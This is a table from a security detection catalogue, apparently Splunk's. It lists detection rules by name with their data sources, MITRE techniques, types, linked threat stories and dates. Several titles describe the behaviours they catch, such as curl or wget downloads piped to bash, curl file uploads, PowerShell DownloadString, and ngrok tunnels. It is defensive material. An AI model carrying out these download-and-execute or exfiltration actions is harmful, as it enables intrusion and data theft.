Splunk Protocol Impersonation Weak Encryption Configuration
|
Splunk
|
Protocol or Service Impersonation
|
Hunting
|
Splunk Vulnerabilities
|
2024-10-17
|
Detect web traffic to dynamic domain providers
|
|
Web Protocols
|
TTP
|
Dynamic DNS
|
2024-10-17
|
DNS Query Requests Resolved by Unauthorized DNS Servers
|
|
DNS
|
TTP
|
Command And Control, DNS Hijacking, Host Redirection, Suspicious DNS Traffic
|
2024-10-17
|
DNS record changed
|
|
DNS
|
TTP
|
DNS Hijacking
|
2024-10-17
|
Any Powershell DownloadFile
|
CrowdStrike ProcessRollup2, Sysmon EventID 1, Windows Event Log Security 4688
|
Command and Scripting Interpreter
PowerShell
Ingress Tool Transfer
|
TTP
|
Braodo Stealer, DarkCrystal RAT, Data Destruction, Hermetic Wiper, Ingress Tool Transfer, Log4Shell CVE-2021-44228, Malicious PowerShell, PXA Stealer, Phemedrone Stealer
|
2024-09-30
|
Any Powershell DownloadString
|
CrowdStrike ProcessRollup2, Sysmon EventID 1, Windows Event Log Security 4688
|
Command and Scripting Interpreter
PowerShell
Ingress Tool Transfer
|
TTP
|
Data Destruction, HAFNIUM Group, Hermetic Wiper, IcedID, Ingress Tool Transfer, Malicious PowerShell, Phemedrone Stealer, SysAid On-Prem Software CVE-2023-47246 Vulnerability, Winter Vivern
|
2024-09-30
|
BITSAdmin Download File
|
CrowdStrike ProcessRollup2, Sysmon EventID 1, Windows Event Log Security 4688
|
BITS Jobs
Ingress Tool Transfer
|
TTP
|
BITS Jobs, DarkSide Ransomware, Flax Typhoon, Gozi Malware, Ingress Tool Transfer, Living Off The Land
|
2024-09-30
|
CertUtil Download With URLCache and Split Arguments
|
CrowdStrike ProcessRollup2, Sysmon EventID 1, Windows Event Log Security 4688
|
Ingress Tool Transfer
|
TTP
|
CISA AA22-277A, Compromised Windows Host, DarkSide Ransomware, Flax Typhoon, Forest Blizzard, Ingress Tool Transfer, Living Off The Land, ProxyNotShell
|
2024-11-28
|
CertUtil Download With VerifyCtl and Split Arguments
|
CrowdStrike ProcessRollup2, Sysmon EventID 1, Windows Event Log Security 4688
|
Ingress Tool Transfer
|
TTP
|
Compromised Windows Host, DarkSide Ransomware, Ingress Tool Transfer, Living Off The Land
|
2024-11-28
|
Curl Download and Bash Execution
|
CrowdStrike ProcessRollup2, Sysmon EventID 1, Windows Event Log Security 4688
|
Ingress Tool Transfer
|
TTP
|
Compromised Windows Host, Ingress Tool Transfer, Linux Living Off The Land, Log4Shell CVE-2021-44228
|
2024-11-28
|
Detect Certify Command Line Arguments
|
CrowdStrike ProcessRollup2, Sysmon EventID 1, Windows Event Log Security 4688
|
Steal or Forge Authentication Certificates
Ingress Tool Transfer
|
TTP
|
Compromised Windows Host, Ingress Tool Transfer, Windows Certificate Services
|
2024-11-28
|
Detect Remote Access Software Usage File
|
Sysmon EventID 11
|
Remote Access Software
|
Anomaly
|
CISA AA24-241A, Command And Control, Gozi Malware, Insider Threat, Ransomware
|
2024-09-30
|
Detect Remote Access Software Usage FileInfo
|
CrowdStrike ProcessRollup2, Sysmon EventID 1, Windows Event Log Security 4688
|
Remote Access Software
|
Anomaly
|
Command And Control, Gozi Malware, Insider Threat, Ransomware
|
2024-09-30
|
Detect Remote Access Software Usage Process
|
CrowdStrike ProcessRollup2, Sysmon EventID 1, Windows Event Log Security 4688
|
Remote Access Software
|
Anomaly
|
CISA AA24-241A, Command And Control, Gozi Malware, Insider Threat, Ransomware
|
2024-09-30
|
Download Files Using Telegram
|
Sysmon EventID 15
|
Ingress Tool Transfer
|
TTP
|
Phemedrone Stealer, Snake Keylogger, XMRig
|
2024-09-30
|
Linux Curl Upload File
|
Sysmon for Linux EventID 1
|
Ingress Tool Transfer
|
TTP
|
Data Exfiltration, Ingress Tool Transfer, Linux Living Off The Land
|
2024-09-30
|
Linux Ingress Tool Transfer Hunting
|
Sysmon for Linux EventID 1
|
Ingress Tool Transfer
|
Hunting
|
Ingress Tool Transfer, Linux Living Off The Land
|
2024-10-17
|
Linux Ingress Tool Transfer with Curl
|
Sysmon for Linux EventID 1
|
Ingress Tool Transfer
|
Anomaly
|
Ingress Tool Transfer, Linux Living Off The Land
|
2024-09-30
|
Linux Ngrok Reverse Proxy Usage
|
Sysmon for Linux EventID 1
|
Protocol Tunneling
Proxy
Web Service
|
Anomaly
|
Reverse Network Proxy
|
2024-09-30
|
Linux Proxy Socks Curl
|
Sysmon for Linux EventID 1
|
Proxy
Non-Application Layer Protocol
|
TTP
|
Ingress Tool Transfer, Linux Living Off The Land
|
2024-09-30
|
Living Off The Land Detection
|
|
Ingress Tool Transfer
Exploit Public-Facing Application
Command and Scripting Interpreter
External Remote Services
|
Correlation
|
Living Off The Land
|
2024-09-30
|
Log4Shell CVE-2021-44228 Exploitation
|
|
Ingress Tool Transfer
Exploit Public-Facing Application
Command and Scripting Interpreter
External Remote Services
|
Correlation
|
CISA AA22-320A, Log4Shell CVE-2021-44228
|
2024-09-30
|
LOLBAS With Network Traffic
|
Sysmon EventID 3
|
Ingress Tool Transfer
Exfiltration Over Web Service
System Binary Proxy Execution
|
TTP
|
Living Off The Land
|
2024-09-30
|
PowerShell Script Block With URL Chain
|
Powershell Script Block Logging 4104
|
PowerShell
Ingress Tool Transfer
|
TTP
|
Malicious PowerShell
|
2024-09-30
|
PowerShell WebRequest Using Memory Stream
|
Powershell Script Block Logging 4104
|
PowerShell
Ingress Tool Transfer
Fileless Storage
|
TTP
|
Malicious PowerShell, MoonPeak
|
2024-09-30
|
Suspicious Curl Network Connection
|
CrowdStrike ProcessRollup2, Sysmon EventID 1, Windows Event Log Security 4688
|
Ingress Tool Transfer
|
TTP
|
Ingress Tool Transfer, Linux Living Off The Land, Silver Sparrow
|
2024-10-17
|
Wget Download and Bash Execution
|
CrowdStrike ProcessRollup2, Sysmon EventID 1, Windows Event Log Security 4688
|
Ingress Tool Transfer
|
TTP
|
Compromised Windows Host, Ingress Tool Transfer, Log4Shell CVE-2021-44228
|
2024-12-03
|
Windows Abused Web Services
|
Sysmon EventID 22
|
Web Service
|
TTP
|
CISA AA24-241A, NjRAT
|
2024-09-30
|
Windows App Layer Protocol Qakbot NamedPipe
|
Sysmon EventID 17, Sysmon EventID 18
|
Application Layer Protocol
|
Anomaly
|
Qakbot
|
2024-09-30
|
Windows App Layer Protocol Wermgr Connect To NamedPipe
|
Sysmon EventID 17, Sysmon EventID 18
|
Application Layer Protocol
|
Anomaly
|
Qakbot
|
2024-09-30
|
Windows Application Layer Protocol RMS Radmin Tool Namedpipe
|
Sysmon EventID 17, Sysmon EventID 18
|
Application Layer Protocol
|
TTP
|
Azorult
|
2024-09-30
|
Windows Curl Download to Suspicious Path
|
CrowdStrike ProcessRollup2, Sysmon EventID 1, Windows Event Log Security 4688
|
Ingress Tool Transfer
|
TTP
|
Compromised Windows Host, Forest Blizzard, IcedID, Ingress Tool Transfer
|
2024-11-28
|
Windows Curl Upload to Remote Destination
|
CrowdStrike ProcessRollup2, Sysmon EventID 1, Windows Event Log Security 4688
|
Ingress Tool Transfer
|
TTP
|
Compromised Windows Host, Ingress Tool Transfer
|
2024-11-28
|
Windows File Transfer Protocol In Non-Common Process Path
|
Sysmon EventID 3
|
Mail Protocols
Application Layer Protocol
|
Anomaly
|
AgentTesla, Snake Keylogger
|
2024-09-30
|
Windows Ingress Tool Transfer Using Explorer
|
CrowdStrike ProcessRollup2, Sysmon EventID 1, Windows Event Log Security 4688
|
Ingress Tool Transfer
|
Anomaly
|
DarkCrystal RAT
|
2024-09-30
|
Windows Ldifde Directory Object Behavior
|
CrowdStrike ProcessRollup2, Sysmon EventID 1, Windows Event Log Security 4688
|
Ingress Tool Transfer
Domain Groups
|
TTP
|
Volt Typhoon
|
2024-09-30
|
Windows Mail Protocol In Non-Common Process Path
|
Sysmon EventID 3
|
Mail Protocols
Application Layer Protocol
|
Anomaly
|
AgentTesla
|
2024-09-30
|
Windows Multi hop Proxy TOR Website Query
|
Sysmon EventID 22
|
Mail Protocols
Application Layer Protocol
|
Anomaly
|
AgentTesla
|
2024-09-30
|
Windows Ngrok Reverse Proxy Usage
|
CrowdStrike ProcessRollup2, Sysmon EventID 1, Windows Event Log Security 4688
|
Protocol Tunneling
Proxy
Web Service
|
Anomaly
|
CISA AA22-320A, CISA AA24-241A, Reverse Network Proxy
|
2024-09-30
|
Windows Protocol Tunneling with Plink
|
CrowdStrike ProcessRollup2, Sysmon EventID 1, Windows Event Log Security 4688
|
Protocol Tunneling
SSH
|
TTP
|
CISA AA22-257A
|
2024-09-30
|
Windows Proxy Via Netsh
|
CrowdStrike ProcessRollup2, Sysmon EventID 1, Windows Event Log Security 4688
|
Internal Proxy
Proxy
|
Anomaly
|
Volt Typhoon
|
2024-09-30
|
Windows Proxy Via Registry
|
Sysmon EventID 12, Sysmon EventID 13
|
Internal Proxy
Proxy
|
Anomaly
|
Volt Typhoon
|
2024-09-30
|
Windows Remote Access Software BRC4 Loaded Dll
|
Sysmon EventID 7
|
Remote Access Software
OS Credential Dumping
|
Anomaly
|
Brute Ratel C4
|
2024-09-30
|
Windows Remote Access Software Hunt
|
CrowdStrike ProcessRollup2, Sysmon EventID 1, Windows Event Log Security 4688
|
Remote Access Software
|
Hunting
|
Command And Control, Insider Threat, Ransomware
|
2024-10-17
|
Windows Remote Access Software RMS Registry
|
Sysmon EventID 12, Sysmon EventID 13
|
Remote Access Software
|
TTP
|
Azorult
|
2024-09-30
|
Windows SQL Spawning CertUtil
|
CrowdStrike ProcessRollup2, Sysmon EventID 1, Windows Event Log Security 4688
|
Ingress Tool Transfer
|
TTP
|
Flax Typhoon
|
2024-10-17
|
WinRAR Spawning Shell Application
|
CrowdStrike ProcessRollup2, Sysmon EventID 1, Windows Event Log Security 4688
|
Ingress Tool Transfer
|
TTP
|
Compromised Windows Host, WinRAR Spoofing Attack CVE-2023-38831
|
2024-11-28
|
Detect DGA domains using pretrained model in DSDL
|
|
Domain Generation Algorithms
|
Anomaly
|
Command And Control, DNS Hijacking, Data Exfiltration, Dynamic DNS, Suspicious DNS Traffic
|
2024-10-17
|
Detect Large Outbound ICMP Packets
|
Palo Alto Network Traffic
|
Non-Application Layer Protocol
|
TTP
|
Command And Control
|
2024-11-06
|
Detect Outbound SMB Traffic
|
|
File Transfer Protocols
Application Layer Protocol
|
TTP
|
DHS Report TA18-074A, Hidden Cobra Malware, NOBELIUM Group
|
2024-10-16
|
Detect Remote Access Software Usage DNS
|
Sysmon EventID 22
|
Remote Access Software
|
Anomaly
|
CISA AA24-241A, Command And Control, Insider Threat, Ransomware
|
2024-09-30
|
Detect Remote Access Software Usage Traffic
|
Palo Alto Network Traffic
|
Remote Access Software
|
Anomaly
|
Command And Control, Insider Threat, Ransomware
|
2024-09-30
|
Detect suspicious DNS TXT records using pretrained model in DSDL
|
|
Domain Generation Algorithms
|
Anomaly
|
Command And Control, DNS Hijacking, Suspicious DNS Traffic
|
2024-10-17
|
DNS Query Length Outliers - MLTK
|
|
DNS
Application Layer Protocol
|
Anomaly
|
Command And Control, Hidden Cobra Malware, Suspicious DNS Traffic
|
2024-10-17
|
Excessive DNS Failures
|
|
DNS
Application Layer Protocol
|
Anomaly
|
Command And Control, Suspicious DNS Traffic
|
2024-10-17
|
Ngrok Reverse Proxy on Network
|
Sysmon EventID 22
|
Protocol Tunneling
Proxy
Web Service
|
Anomaly
|
CISA AA22-320A, CISA AA24-241A, Reverse Network Proxy
|
2024-09-30
|
SSL Certificates with Punycode
|
|
Encrypted Channel
|
Hunting
|
OpenSSL CVE-2022-3602
|
2024-10-17
|
TOR Traffic
|
Palo Alto Network Traffic
|
Proxy
Multi-hop Proxy
|
TTP
|
Command And Control, NOBELIUM Group, Prohibited Traffic Allowed or Protocol Mismatch, Ransomware
|
2024-09-30
|
Zeek x509 Certificate with Punycode
|
|
Encrypted Channel
|
Hunting
|
OpenSSL CVE-2022-3602
|
2024-10-17
|
Detect Remote Access Software Usage URL
|
Palo Alto Network Threat
|
Remote Access Software
|
Anomaly
|
CISA AA24-241A, Command And Control, Insider Threat, Ransomware
|
2024-09-30
|
Juniper Networks Remote Code Execution Exploit Detection
|
Suricata
|
Exploit Public-Facing Application
Ingress Tool Transfer
Command and Scripting Interpreter
|
TTP
|
Juniper JunOS Remote Code Execution
|
2024-09-30
|